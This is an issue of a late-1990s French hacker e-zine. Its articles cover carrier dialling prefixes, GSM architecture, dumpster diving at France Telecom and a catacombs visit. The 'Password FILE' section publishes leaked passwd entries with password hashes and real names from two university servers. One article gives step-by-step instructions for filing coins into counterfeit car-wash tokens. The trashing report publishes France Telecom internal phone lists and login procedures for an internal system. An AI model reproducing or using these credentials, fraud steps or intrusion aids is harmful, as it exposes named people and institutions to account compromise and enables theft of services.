(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )    Prefixes nationaux     )    2.7    (          vatoo            (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)



Depuis le debut de l' annee, il est possible d' acceder aux operateurs 
prives grace a des prefixes.
Il en existe deux types. Le premier, a un chiffre (dit " E "), est a composer 
a la place du 0 et a faire suivre des neuf chiffres habituels 
(a l' international, E0 au lieu de 00). A noter le cas particulier 
du 0, qui correspond a l' operateur de boucle locale auquel l' utilisateur 
est raccorde. Dans la plupart des cas, c' est malheureusement FT 
(pour l' instant ;). Dans de rares cas, ca peut etre Cegetel, Worldcom ou 
Colt pour un client directement relie a leur boucle optik, et FT est alors 
accessible par le 8.
  Le second type de prefixe est compose de 4 chiffres (du type 16XY), a 
composer avant les 10 chiffres habituels ( a l' international, 16XY00 au lieu 
de 00). Les prefixes sont utilisables pour les appels hors du departement 
Longue Distance. Ils ne sont pas utilisables depuis les cabines, vers les 
mobiles, vers les numeros speciaux ( 3BPQ et 08). C' est encore France Telecom 
qui s' y oppose, meme pour 1999.

     Liste des prefixes:

    Prefixe    |    Operateur
---------------|--------------------------
2              |  SIRIS
4              |  TELETEL
5              |  OMNICOM
6              |  ESPRIT TELECOM
7              |  CEGETEL
8              |  FRANCE TELECOM
9              |  9 TELECOM
1601           |  PROSODIE
1610           |  TELEGLOBE
1611           |  GEOLINK
1616           |  AXS
1617           |  INFOTEL
1618           |  WORLDCOM
1620           |  INTEROUTE
1623           |  VIATEL
1626           |  A TELECOM (AXIS)
1630           |  KERTEL (PINAULT)  <<<--- ouaish ouaish ;)
1633           |  GLOBAL ACCESS
1639           |  FIRST TELECOM
1640           |  KAT' AQUITAINE
1654           |  ESTEL (STRASBOURG)
1655           |  WESTERN TELECOM   <<<--- mes p'tits cowboyz ;)
1656           |  PRIMUS
1659           |  BELGACOM
1660           |  UNIGLOBE
1661           |  RSC COM
1670           |  GOLDEN LINE
1677           |  PHONE SYSTEMS
1678           |  WORLDXCHANGE
1682           |  KDD
1688           |  LDI
1690           |  COLT
1696           |  ECONOPHONE


(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )     Password FILE         )    2.8    (    Aaah@mail.dotcom.fr    (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)



Suite a mon article du N1 j'ai reu plusieurs mails me disant: "ouais c'est 
kewl ta rubrique mais j'aimerais que tu nous montres la methode pour l'avoir, 
patati patata ..." A ceux l je reponds par 2 choses : un articles sur les 
exploits UNIX est en preparation, les mthodes n'ont absolumnent rien 
d'extraordinaires ces des exploits connus qu'on peut trouver sur rootshell et 
compagnie (bug sendmail, cgi etc ...) alors je vais pas reexpliquer ces 
methodes archi maintes fois rabaches ! 

Bon bah ce mois ci je vous donne 2 passwords file d'universit l'un en 
Angleterre, et l'autre aux States (petit coucou aux admins). Je lance aussi 
un grand sondage pour ou contre cette rubrique vous m'envoyez votre vote sur 
Aaah@mail.dotcom.fr SI YA MOINS DE 10 VOTES J'ARRETE CETTE RUBRIQUE !


==========================================================================

www.cl.cam.ac.uk: Computer LABORATORY university of CAMBRIDGE
****************

root:RK2fP/SciTdfE:0:1:Root:/:/bin/sh 
daemon:*:1:1:system background account:/: 
bin:*:3:4:system librarian account:/bin: 
uucp:*:4:39:UUCP/FAX gateway:/var/spool/fax: 
fax:*:4:39:Facsimile Agent:/var/spool/fax: 
tcb:*:9:18:Trusted Computing Base:/tcb: 
adm:*:10:32:Administration Subsystem:/usr/adm:sr/opt/amanda:/dev/null 
ileaf:*:79:1:Interleaf:/usr/groups/interleaf:/dev/null 
sendmail:*:83:1:Sendmail:/:/dev/null 
mentor:v3r/pSTrKCz0w:89:72:Mentor:/usr/groups/mentor:/dev/null 
       maj:KyaXu2IXS07oA:101:20:Martyn Johnson:/home/maj:/usr/bin/bash 
       pb:rL999AvVVuudM:104:20:Piete Brooks:/home/pb:/usr/bin/bash 
gt19:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash 
       gt:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash 
       gtcsh:ZoaJBDqJXVMq.:178:20:Graham Titmus:/homes/gt:/bin/csh 
        ckh:lbuRVWtVkFX5w:1167:20:Chris Hadley:/homes/ckh:/usr/bin/bash 


rocket.cc.umr.edu: Un server de l'universite du Missouri-Rolla 
*****************

root:9ZW.ILIJpPQ72:0:3::/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
troot:kerberos:0:0:AFS Base 
      Root User:/afs/umr.edu/software/sysprog/troot:/umr/bin/tcsh
ff:kerberos:1017:5000:Bruce McMillin:/afs/umr.edu/users/ff:/bin/csh
jlu:kerberos:2435:5000:Jui-Lin Lu:/afs/umr.edu/users/jlu:/umr/bin/tcsh
rms:kerberos:5002:5000:Richard 

Ceci est un rsum du password file en effet il y 1500 logins avec KERBEROS. 
Kerberos k'est ce que c'est ? c'est un systeme de password temporaire qui 
change tres souvent, d'ou la prsence de kerberos a l'emplacement du password 
crypt.


                                   -=-

Je compte sur vos contributions ou collaborations. Aaah@mail.dotcom.fr




(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )      Elephant bleu        )    2.9    (            ced99          (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)



INTRO

 Les stations de lavage Elephant bleu sont gerees par la societe Hypromat lavage. 
Cette societe est tres bien implantee en FRance et en Europe. D' ou l excellente idee 
de produire un jeton universel.Comme une station de lavage coute tres chere, hypromat 
utilise des monnayeurs peu perfectionnes.Le systeme de detection de la piece est base 
sur trois principes:

* Mesure de l epaisseur
* Mesure de la largeur
* Identification de l alliage

Il ne reste plus qu a fabriquer ses jetons. Facile, non !
D' autres methodes pour cracker ces monnayeurs existent, par exemple injecter de l eau 
dans le monnayeur grace a la lance ou a passer un tournevis pour provoquer un court- 
circuit dans la partie electronique.
Ces procedes sont peu fiables et aleatoires.Et puis PEACE and LOVE nous ne sommes pas 
des vandales.

CONCEPTION

Donc il ne reste plus qu' a fabriquer ces jetons. Le plus difficile est l alliage.Mais 
en regardant de plus pres ce fameux jeton on s' apercoit qu il nous est tres familier.
En fait la piece de 50 centimes lui ressemble etrangement.Bizarre, non.Vous me direz a 
quoi sert de payer des ingenieurs ? Les modifications a apporter a cette piece sont 
minimes. le seul materiel a utiliser est une meule ou une lime si le courage vous en 
dit.
Mais prenez plutot une meule c est plus rapide.Commencez par usiner le contour de la 
piece.A l origine cette piece possede des peites fentes;ils faut les faire 
disparaitre entierement.ATTENTION a ne pas trop usiner la piece sinon apres la piece ne 
sera plus reconnue.
La deuxieme etape est d' usiner les 2 faces, il faut eliminer le petit rebord autour de 
la piece. UNE fois de plus attention, l' usinage doit etre etre tres minutieux.Avec 
l habitude, ca va tres vite.
Le resultat n est pas sur a 100%. Usinez plusieurs pieces et essayez-les. Si une 
piece ne passe pas dans un monnayeur, cela ne veut pas dire qu elle ne passe pas dans 
celui d'a cote.

Le seul moyen pour hypromat de contrer cette fraude serait deja de renvoyer les 
monnayeurs pour les retalonner plus precisement (seules 3 societes en france 
reprogramment les monnayeurs), de changer ces jetons qui ont a peine un an de service 
et ki sont distribues dans toute l' europe.
Cette modification fonctionne pour le lavage (equivaut a une piece de 10 frs) mais 
aussi pour l aspirateur dans certains centre de lavage.
ATTENTION a ne pas utiliser ces pieces lorsque le cum qui remplit les bidons de savon 
est dans le coin.

INFOS: Certaines pieces provenant des antilles et de la polynesie francaise sont 
reconnues dans certains distributeurs comme des pieces de 20 frs.

  						BY ELEPHANT MAN FOR CRYPTEL.



(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )    Paris Underground      )    2.10   (            vatoo          (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


GSM, standard europeen de la telephonie mobile

Le systeme GSM (Global System for Mobile communications) a ete defini 
a la fin des annees 80 par des operateurs et des industriels reunis par 
l' Etsi (European Telecommunications Standard Institute). L' objectif 
etait de creer une norme eyropeenne de telephonie cellulaire numerique 
palliant les lacunes des systemes de telephonie cellulaire analogique 
(taille importante des mobiles, incompatibilite entre les pays, non 
confidentialite des communications, et efficacite spectrale faible).
L' evolution rapide du marche a favorise la creation de portables de 
petite taille, offrant une bonne qualite d' ecoute, et utilisables 
partout en Europe. La norme GSM constitue aujourd' hui une reference 
mondiale, sauf aux Etast-Unis, ou les technologies CDMA-TDMA dominent.
En France, 3 operateurs ont obtenu une licence permettant de 
developper un reseau GSM. Ainsi, Bouygues Telecom, France Telecom 
Mobiles et SFR developpent constamment l' infrastrucutre de leur 
reseau, c' est a dire les equipements qui raccordent les telephones 
mobiles au RTC (Reseau telephonique commute, voir CRYPTEL #1). La 
liaison entre telephones mobiles s' effectue via des stations relais 
radio. Chacune d' elles assure la communication radio avec les mobiles 
dans une zone geographique precise, appelee cellule. La qualite et la 
disponibilte du service etant liees a la qualite des communications 
radio, il est necessaire soit d' augmenter la puissance des mobiles 
(ce qui en augmente la taille), soit de multiplier le nombre de ces 
stations relais radio. Ainsi se sont installees sur le toit des 
immeubles des antennes assurant la communication avec les mobiles. 
La repartition geographique des relais radio depend de la densite 
de trafic estimee. A la campagne, les cellules, moins nombreuses, 
se deploient dans un rayon large (35 km environ). En revanche, en 
ville, ou le trafic est beaucoup plus important, les cellules 
couvrent une superficie reduite (300m de rayon environ). On parle 
alors de microcellules. L' ensemble des cellules du reseau d' un 
operateur forme le PLMN, auquel est attribue un ensemble distinct 
de frequences. Cela permet aux reseaux Bouygues Telecom, Itineris 
et SFR de couvrir la France, sans que les interfaces ne viennent 
parasiter les communications.

Le PLMN, une architecture complexe

L' utilisateur peut appeler un correspondant (et etre appele) 
quelle que soit la cellule dans laquelle il se trouve. S' il est 
impossible d' affecter de maniere fixe les canaux radio aux 
differents abonnes, il est necessaire d' allouer dynamiquement 
les differentes ressources physiques aux echanges logiques 
relatifs aux abonnes presents dans les cellules. Cette fonction, 
appelee la gestion des ressources radio (RR), fournit une 
meilleure efficacite spectrale que ne le faisaient les anciens 
systemes analogiques de telephonie mobile. Elle acroit la 
capacite de trafic et le nombre d' utilisateurs du reseau de 
telephonie mobile. La gestion de la mobilite est une autre 
fonction essentielle de ce type de reseau, qui inclut la 
localisation des mobiles en veille ainsi que l' etablissement 
et la maintien des comms pendant un deplacement (hand-over). 
L' infrastructure d' un reseau de telephonie mobile, ou 
PLMN, est composee de trois sous-systemes: le sous-systeme 
radio (BSS), le sous-systeme d' acheminement dans le reseau 
(NSS), et, enfin, le sous-systeme d' exploitation (OSS).
Le premier est un modem qui assure la gestion des ressources 
radio indispensables aux echanges avec les mobiles, et le 
transfert des comms entre les mobiles et le NSS. L' interface 
mobile-NSS est appelee interface Air. Elle offre une bonne 
qualite de service grace a la transmission numerique et au 
codage de la voix. La confidentialite des communications 
est assuree par le chiffrement des echanges. L' interface Air 
est caracterisee par un schema d' acces multiple a la fois 
frequentiel et temporel, qui a pour nom TDMA. Sur chaque 
frequence emise par un relais radio, on obtient une decoupe 
des trames en 8 intervalles de temps. Les couples (frequence 
et intervalle de temps) constituent les ressources radio 
physiques qui sont attribuees par configuration aux 
differents canaux logiques de controle, de signalisation 
et de trafics necessaires aux echanges entre les mobiles 
et les BSS, sous-systeme radio constitue de plusieurs 
types d' equipements, dont les BTS. Les BTS sont les 
stations de base qui assurent le couplage radio avec les 
mobiles sur l' interface Air. Ils effectuent egalement le 
multiplexage des trames TDMA, le traitement du signal de 
parole (modulation, demodulation, codage canal, chiffrement 
et transcodage GSM-MIC, modulation par impulsion et codage) 
ainsi que les mesures de puissance des mobiles pour assurer 
une bonne qualite de communication. Les BTS sont pilotes 
par le controleur de station de base (BSC). Cet organe 
intelligent du BSS concentre les circuits de parole et de 
donnees vers le sous-syteme d' acheminement dans le reseau 
NSS. Il gere les ressources radio physique et les canaux 
logiques, et alloue ces derniers aux appels qu' il traite.
Le BSC administre la mobilite des abonnes entre les cellules 
qu' il pilote. Enfin, il realise le controle des mobiles, 
tant en matiere de puissance d' emission que de 
synchronisation temporelle. Les BTS d' un BSS sont relies 
aux BSC par des liaisons MIC a 2 Mbit/s. Sur ces liens 
transitent les comms vocales ou de donnees, ainsi que la 
signalisation BTS-BSC, MS-BSC et MS-MSC. La signalisation 
utilise le protocole LAPD (Link Access Protocol Digital) 
pour la couche de liaison de donnees.

Le commutateur, lien entre le fixe et le mobile

La deuxieme partie d' un reseau de telephonie mobile 
comprend le NSS, sous-systeme en charge du traitement 
d' appel, de la connexion au reseau telephonique, et 
de la gestion des abonnes. Il est interface avec plusieurs 
BSS, et a un role de concentration et de commutation des 
comms. Un NSS se compose des enormes bases de donnees 
relatives aux abonnes (HLR) et a la localisation des mobiles 
(VLR). Les commutateurs, baptises MSC, sont le plus souvent 
dotes des commutateurs du RTC, auxquels les fonctions 
specifiques du GSM ont ete ajoutees par les mecanismes de 
reseau intelligent. Ils etablissent les appels entre les 
mobiles et les abonnes fixes, ou entre les mobiles, et 
incluent les fonctions de traitement des appels (CC), 
de gestion de la mobilite (MM), d' echange des messages 
courts (SMS, Short message services), et d' administration 
des services supplementaires (SS). Certains d' entre eux 
sont interfaces avec le centre a autonomie d' acheminement 
(CAA) du RTC, ils sont alors denommes GMSC ou passerelles 
MSC. Le trafic entre les MSC peut etre achemine par le RTC. 
Mais depuis quelques annees, l' operateur d' un reseau de 
telephonie mobile (PLMN) peut utiliser sa propre 
infrastructure de transmission pour etablir des circuits 
de parole entre les MSC. L' acheminement des appels est 
alors conduit par le PLMN jusqu' a un GMSC, qui transmet 
l' appel au CAA auquel il est connecte. Chaque MSC est 
couple a une base de donnees qui recueille les donnees 
d' acheminement relatives aux abonnes visiteurs situes 
dans une zone precise (VLR). Une deuxieme base de 
donnees (HLR) contient les infos relatives aux abonnes 
telles que les services souscrits, leur identification, 
leur numero d' annuaire, ainsi que la reference du VLR 
correspondant a la localisation de l' abonne. Un PLMN 
pourra contenir un ou plusieurs HLR selon le nombre 
d' abonnes. Pour la partie controle, le reseau de 
telephonie mobile dispose d' un centre 
d' authentification (AuC).

NSS et BSS relies par interface normalisee 

Cet equipement gerant les cles de securite de chaque abonne 
est souvent situe sur la meme machine que le HLR. Le centre 
d' identification (EIC, Equipment Identification Center), lui, 
contient les infos necessaires pour verifier que le mobile est 
autorise sur un reseau. Pour relier les deux sous-reseaux, 
NSS et BSS, les operateurs mettent en oeuvre une interface 
bptisee A. Grace a cette normalisation, ils peuvent interconnecter 
les equipements NSS et BSS de differents constructeurs. Les 
controleurs des stations de base (BSC), eux, sont relies aux 
MSC par des liaisons MIC a 2 Mbit/s par lesquelles transitent 
les comms avec les mobiles et la signalisation MS-MSC ou 
BSC-MSC. La signalisation utilise les protocoles du reseau 
semaphore SS7 et une couche specifique au GSM, appelee BSSAP. 
Les divers MSC d' un PLMN sont aussi relies par des liaisons 
MIC, qui vehiculent les circuits de parole. L' echange de 
signalisation entre les constituants du NSS est realise par 
le reseau semaphore SS7 associe au PLMN, auquel a ete ajoute 
le protocole MAP (Mobile Application Part). L' interface 
MSC-HLR est normalisee pour autoriser les echanges de 
signalisation entre PLMN lorsque les mobiles sont utilises 
a l' etranger. L' interface PLMN-RTC ou PLMN-RNIS est realisee 
par les passerelles GSMC connectees au CAA par des liaisons 
MIC a 2 Mbit/s et par le reseau semaphore SS7.


Questions/reponses:


Q- Comment un utilisateur est-il identifie ?

R- >>Etape1:Quand un mobile fonctionne, il parcourt les 
frequences et recherche les canaux de controle emis par les 
stations de base (BTS) afin de se synchroniser en frequence 
temporellement.Le mobile ecoute les infos systemes diffusees 
par les BTS pour recueillir toutes les infos sur le reseau.

>>Etape2:Une fois que la station de base susceptible de lui 
fournir la meilleure qualite radio a ete retenue, le mobile 
demande un canal de signalisation dedie, alloue par le 
sous-systeme radio (BSS)

>>Etape3:Ce sous-systeme etablit une connexion SS7 avec 
le commutateur du reseau (MSC).

>>Etape4:Quand le mobile a signale sa presence au commutateur 
MSC visit, celui-ci met l' identite du mobile dans les bases 
de donnees locales centralisees.

>>Etape5:Le commutateur fournit au mobile une identite provisoire 
qui sera ensuite utilisee pour les echanges entre le mobile et 
le reseau.


Q- Qu' est-ce que la puce SIM ?

R- Chaque abonne GSM recoit une carte a puce denomme carte SIM 
(Subscriber Identification Module), qui constitue sa carte 
d' identite sur le reseau. Cette carte renferme les informations 
necessaires pour acceder au reseau d' un operateur. Elle existe 
sous deux types de formats: carte de credit et miniature. La 
carte SIM contient des caracteristiques du reseau (identite du 
PLMN et plage de frequences utilisee), des parametres d' abonnement 
(identite internationale de l' abonne et services demandes), des 
donnees de securite (mot de passe de l' abonne ainsi que cle 
d' authentification et de chiffrement), des informations sur la 
mobilite (identite provisoire et indicateur de zones de 
focalisation) et, enfin, des donnees temporaires comme les 
messages courts recus.


Q- Quelles sont les etapes d' un appel d' un poste fixe a un mobile ?

R->>Etape1:L' abonne du reseau de telephonie fixe compose le numero 
de l' abonne mobile (MSISDN). Celui-ci est de la forme 
ID Z AB PQ MCDU. L' ID est l' indicatif du pays (33 pour la France); 
Z indique la zone (Z=06, qui est reserve pour les mobiles); AB est 
l' indicatif attribue a chaque operateur (07 et 08 pour FT, 60 pour 
Bouygues, 09 pour SFR); PQ identifie le HLR, et MCDU l' abonne.

>>Etape2:L' appel est transmis au commutateur d' acheminement (CAA) 
auquel l' abonne fixe est connecte.

>>Etape3:L' appel est aiguille vers le commutateur passerelle (GMSC) 
le plus proche du reseau mobile.

>>Etape4:Pour connaitre les informations sur l' abonne mobile, ce 
commutateur passerelle interroge la base de donnees centralisee (HLR).

>>Etape5:Le HLR interroge a son tour la base de donnees locale (VLR) 
du commutateur (MSC) pour localiser le mobile.

>>Etape6:En retour, la base de donnees locale fournit a la base de 
donnees centralisee un numero provisoire (MSRN).

>>Etape7:La base de donnees centralisee informe le commutateur 
passerelle du numero provisoire pour pouvoir joindre directement le 
commutateur visite par le mobile.

>>Etape8:Le commutateur passerelle va etablir un appel vers le 
commutateur concerne.

>>Etape9:Le commutateur recherche le mobile en demandant une 
procedure de recherche (paging) au controleur de stations de base 
(BTS) du sous-systeme radio concerne (BSS).

>>Etape10:Le BSS diffuse alors la recherche (numero provisoire 
du TMSI) sur toutes les stations de base (BTS).

>>Etape11:Une fois le mobile repere, le BSS lui alloue un canal 
de trafic. Le circuit de parole est etabli entre le mobile et 
l' abonne fixe a travers ce canal de trafic. La conversation 
peut alors commencer (enfin!).


Q- Quelles sont les etapes d' un appel d' un mobile a un poste fixe?

R->>Etape1:Le mobile utilise le canal de signalisation pour 
s' identifier aupres du reseau, etablir le chiffrement, et demander 
au commutateur visite l' etablissement de l' appel sortant.

>>Etape2:L' analyse du numero de l' appelant dans la base de donnees 
centralisee permet au commutateur de constater que le numero 
appartient au reseau fixe.

>>Etape3:La base de donnees centralisee (HLR) recherche l' adresse du 
commutateur passerelle (GMSC) auquel est rattache l' abonne fixe.

>>Etape4:La base de donnees HLR communique cette adresse au 
commutateur MSC relie au BSS, sous-systeme radio sur lequel 
l' utilisateur mobile est raccorde.

>>Etape5:Le commutateur aiguille alors l' appel vers ce commutateur 
passerelle MSC.

>>Etape6:L' appel est route vers le centre d' acheminement auquel 
l' abonne fixe est connecte.

>>Etape7:Le centre d' acheminement entre en contact avec l' appele, 
et la communication peut alors s' etablir.

>>Etape8:Le commutateur demande au sous-systeme radio (BSS) d' allouer 
un canal de trafic.

>>Etape9:Le canal de signalisation est libere, et le circuit de parole 
est etabli entre le mobile et l' abonne fixe.

>>Etape finale:Lorsque l' un des deux abonnes raccroche, un dialogue 
de fin d' appel se deroule entre le commutateur et le mobile, et le 
canal de trafic est libere.


(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )           TrAsH FT        )    2.11   (    Aaah@mail.dotcom.fr    (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


Malgre les -10c, le vent, le froid, la neige, la pluie, le gele, le verglas, 
l'ouragan, le typhon, le cyclone, la dpression polaire arctique et antarctique 
(bon on va peut etre s'arreter l) Aaah a brav les intempries pour aller trasher 
chez FT. Tan Tan Tan hroique non ? :-) Bon ca a pas ete une mince affaire parce 
que la poubelle que je visais ce soir l etait en plein champs de vision du 
gardien ... dur ... enfin j'ai profit d'un instant ou il lavait sa vitre pour 
m'emparer d'un sac poubelle et disparaitre dans la nuit pour aller accomplir 
mon devoir ... Tan Tan Tan.

Bon alors y avait pas mal de truc dans cette poubelle on va commencer par 
les trucs FUN : 
- Le journal syndical de la CGT : NON AU 35 HEURES ! (a promet)
- Une tonne indescriptible de mgots et cendres (zont nerveux chez ft ?)
- Du dtergeant chimique (a c pas cool j'ai eu des taches ...)
- et cerise sur le gateau : du pq ... on aura tout eu dans celle l ...
- J'oubliais l'apotose un mail envoy a une employ qui ressemblait fort a 
  une invitation dans un secte ("venez entendre la voie de la raison")

Plus srieusement j'ai trouv quelque trucs interressants :
- Un CD-Rom en cours d'analyse (bah oui il est abim) une chose est sur le 
  parc informatique pour les employs de FT c win 98/95 et NT  

- Une liste des badges ayant acces  certains niveaux de scurit dans le 
  batiment. Je ne la publierai pas tout simplement parce qu'elle ne sera 
  d'aucune utilit pour vous :-) et a indiquera trop vite  FT ou j'ai trash 
  (quoi qu'a mon avis c facil  deviner)

- Une liste (celle ci beaucoup plus instructives) comprenant plusieurs N 
  de tel et jargon technique que je n'arrive pas  dfinir. Je vous publie 
  cette liste si qqun aurait la dfinition de certains trucs ou peut tout 
  simplement clairer ma lanterne, un petit mail sera le bienvenu 
  (Aaah@mail.dotcom.fr)



Nom du centre:   CPRI:         N COLISEE         FAX:       RESEAU:
======================================================================
Amiens           Lille     277 111 / 277 406    0322537280  0322537111
======================================================================
Andilly                    209 690 / 209 611    0134329608  0134329611
======================================================================
Angers           Nantes                                     0241607515
======================================================================
Annecy                   227225/227228/227457   0450667449  0450667444
                            227111/227459   
======================================================================
Archives     Sebastopol  207460/207111/207419               0148017499
                                 208123                           7111  
======================================================================
Arpajon         Villabe   			            0164900823
=======================================================================
Aubervilliers             215005/215111/215004              0148115111
                          215007 GEB 0143525718
=======================================================================
Auber DRIF              0143525150 GLM 0148341717
=======================================================================
Auber GEB						     0143525113
=======================================================================
Auxerre	    Dijon         GET: 0386493590		     0386522941
=======================================================================
Bagnolet	    		268574 CONS: 268488	     0149938574
=======================================================================
Bayonne							     0559526196
=======================================================================
C.I.P.B			  206401 / 0142446262
=======================================================================
Beauvais      Amiens        CPE: 0344841392
=======================================================================
Bercenay		         267114
=======================================================================
Besancon		   207111/257444/257448              0381801389
 				   257455 277449
=======================================================================
Bessancourt   Eragny          209 111 / 209 356 	     0130403904
=======================================================================
Bordeaux                243111/243408/243404		     0557813401
			  S 243444 243 429
=======================================================================
Bordeaux mer                 243528
=======================================================================
Caen academie           231111/231608/231629    0231251120   0231251111
=======================================================================
Caen ven                  GET 231227/231228    		     0231251111
			     CONS: 231241
=======================================================================
Chartres      Orleans    CPE: 0237208739
=======================================================================
Chateauroux   Tours      0247405381/82
=======================================================================
Chenneviers         219527/219528 CONS: -524 SUP: -523	     0149629429
							     0149629111
=======================================================================
Chenne HZ			219402
=======================================================================
Clamecy	Auxerre	CPE:                                         0380303456
=======================================================================
Clermont FD                 225832/225802          	     0473425700
=======================================================================
Corbeil	Villabe         201111 commut: 201470                0169114513
=======================================================================
Creil  Amiens		       				     0344281020
=======================================================================
Dijon		  256111/-454/-325/-258 CONS: 256455
=======================================================================
Douai	Lille                  254 359
=======================================================================
Echiquier   Sebastopol  207111/207379/S:207719/ 207412	      014817111
=======================================================================
Evreux 			       CPETRAN:                      0232315730
=======================================================================

Voil a c'est qu'une 1ere partie j'ai toute une liste des villes par ordre 
alphabtique, si qqun veut la suite il me mail je lui envoie et il en 
profite pour m'expliquer un peu ce truc parce que l j'avoue je nage ... 
(CPE? Colisee ? CONs, GLM, GET, GSP etc ... :-)

- Un dernier tres interressant malheureusement je n'ai pas eu le fichier 
  entier j'en ai que 3 pages : Le manuel utilisateur du PM2  diffusion contrle.
  C'est dommage que j'ai 3 pages sur 69 mais bon je garde espoir de le retrouver 
  entier lors d'un prochain trash :-)


II Procedures de connexion et de deconnexion
********************************************
1.1 Connexion
L'acces PM2 se fait viale rseau x25. Tapez le numro d'acces  PM2 sur votre 
terminal et validez           
 						## ## ##
Apres le message d'acceuil notifiant votre enregistrement tapez:
						CN MP2
Puis votre identifiant
						######
ensuite votre mot de passe	
						######

Le mot de passe vous est dlivr par la Direction d'apllication MP2
Tel: 0141375168 - 0141675299 - 0141675298
Fax: 0141675169
*/C aaah la qui parle je vous demande de pas appeler ou tenter un social 
    en ardos sans rien sous le bras grillpas tout de suite ce numro\*

L'ecran suivant apparait:

----Informations PM2-23B --------- MENU GENERAL --------- ABANDON (nul):
					     ************
INFO EXPLOITATION DU 14/01/98 ------------------------------------------
*************** Le numero du centre de calcul est le 0141675449 ********
Le 14/01/98 a 8h30 reste a reemettre: 378 os dans TEMILEX
            a 14h  reste a reemettre:     os dans TEMILEX
PB pour reemission os du password = support FONCT 23B au 0141675295/96/97
PB password PM2 = support fonctionnel PM2 au 0141675168
************************************************************************
INFO 23B du 09/01/98 ---------------------------------------------------
************************************************************************
*							               *
* AUX UTILISATEURS: merci de signaler les incidents sur le V60 aux sup *
*			  fonct un cadeau sur INF23B                   *
*							               *
************************************************************************

INFO PM2 du 23/08/95 ---------------------------------------------------
`INF` permet de consulter les numeros de FAX des destinataires RECTIF
Modification du numero de FAX du centre CARNOT : 40545232 devient 44151212

-------------------------------------------------------------------------

Vous etes maintenant connecte au TDS de M2/23B. Sans vous preoccuper de 
positioner quelconque curseur tapez encore:
								PM2
Vous etes maintenant connecte a PM2 (voyez page suivante les ecran d'accueil 
que vous faites defiler en appuyant sur la touche TRANS ou RETURN et vous 
pouvez commencer toute consultation de votre choix (voir la liste des 
consultations possibles plus loin dans ce manuel)

[FIN DE PAGE 6/69] j'ai pas la suite ... si qqun a mailez moi



Autre page du manuel:
DEMANDE D'EXTRACTION (suite)
****************************

L'ecran suivant apparait:
-------------------------

CREATION 							CTL:_____
			SELECTION DES EDITIONS
				    CODE SITE DESTINATAIRE:_

	1- EDITION DES BLOCS
	2- EDITION DES BLOCS AVEC ROUTAGE
	3- EDITION DES ENSEMBLES DE SECURISATION
	4- EDITION DES SECTIONS
	5- EDITION DES SECTIONS D'UN CENTRE OU D'UN REPARTITEUR
	6- EDITION DES SECTIONS AVEC ROUTAGE
	7- EDITION DES TRONCONS
	8- EDITION GLOBALE DES COFFRETS
	9- EDITION PARTIELLE DES COFFRETS
	10- EDITION DES MOUVEMENTS DES CASES DE COFFRETS
	11- EDITION DES LIAISONS SPECIALISEES
	12- EDITION DES PLANS DE CABLAGE
	13- EDITION DISPONIBILITE DES BLS
	14- EDITION PARTIELLE DE BPN

						NUMERO D'EDITION: __
						DERNIERE DEMANDE CREE: 09553


Tapez "G" (comme Noisy-le-Grand) dans le champ <CODE SITE DESTINATAIRE>, 
choisissez l'edition qui vous interesse,
Validez,
Servez l'ecran correspondant  votre demande et validez les parametres que 
vous venez de saisir sur ce dernier cran.
Notez bien alors le numro d'dition affich  la ligne DERNIERE DEMANDE CREE 
c'est lui qyu vous permettra de modifier (type2 du contexte de travail) ou de 
supprimer (type 4 du contexte de travail) votre demande.
N'oubliez pas d'inscrire le champ <OBSERVATIONS> l'adresse ou devra etre 
envoy le listing par la cellule PM2. 
si vous avez demand une sortie disquette, telephonez au 0141675299 en donnant 
votre code demandeur et le numro de votre demande. 
En vous mettant le lendemain en mode "MODIFICATION" et en rappelant votre 
demande vous saurez si votre demande a ete traitee.

Remarque: certaines editions ne sont possibles qu'a partir du superviseur PM2. 
Telephonez

[FIN PAGE 66/69]

Voil cette machine a l'air vraimment interessante, si qqun a la doc 
(on sait jamais) + d'infos sur ce systeme, etc bah vous connaissez ma phrase 
rituelle : mailez moi Aaah@mail.dotcom.fr.

Participez on va pas tout faire !

Resultat de trash RDV au numro 3



(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )    Paris Underground      )    2.12   (            vatoo          (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)



   Une visite du sombre monde sous la ville lumiere- par murray battle, 
   traduit et adapte par vatoo.	

Une visite non-guidee des catacombes Parisiennes. La vision est fantastique - des 
murs entiers d' os et de cranes entremeles, des galeries symetriques. C' est un vrai 
contraste avec les reelles catacombes, a ce que j' ai appris plus tard. La plupart 
des touristes etrangers n' ont aucune idee de ce qui se passe en ces lieux.  Il y a 
un grand nombre de citations, dont ma preferee:    "Insense que vous etes, Pourquoi 
vous promettez-vous de vivre longtemps , vous qui ne pouvez compter sur un seul jour".
Nous apparaissons dans une grande allee, loin de notre point de depart, il fait chaud, 
c' est tres sombre, et je me sens un peu impressionne.  Je suis ici a Paris pour 
comprendre pourquoi les gens vont dans ces sous-sols. Cela parait totalement 
irrationnel. Nous finissons tous ici, 6 pieds sous terre. Pourquoi accelerer le 
processus?  Emmanuel Gabily va me servir de guide dans l' underground. Je le trouve 
inquietant. Nous nous sommes rencontres sur le net et nous sommes a present assis 
face a face dans un cybercafe dans un quartier industriel de Paris. Emmanuel est 
inquiet a propos de mes bottes. Il pense qu' elles ne sont pas assez hautes. Ce 
n' est pas bon signe.  Emmanuel n' est pas seul. Il est accompagne d' un garcon 
denomme Benito (Benjamin Nitot), qui adore, tout comme Emmanuel, initier des 
neophytes.  
Nous nous promenons dans la voiture d' Emmanuel, alors que le paysage citadin de 
Paris disparait peu a peu. Nous entrons dans la banlieue. Emmanuel connait quelques 
caves qu' il desirerait nous montrer. La premiere est faite de craie. Je n' ai pas 
une grande impression a ce sujet.  

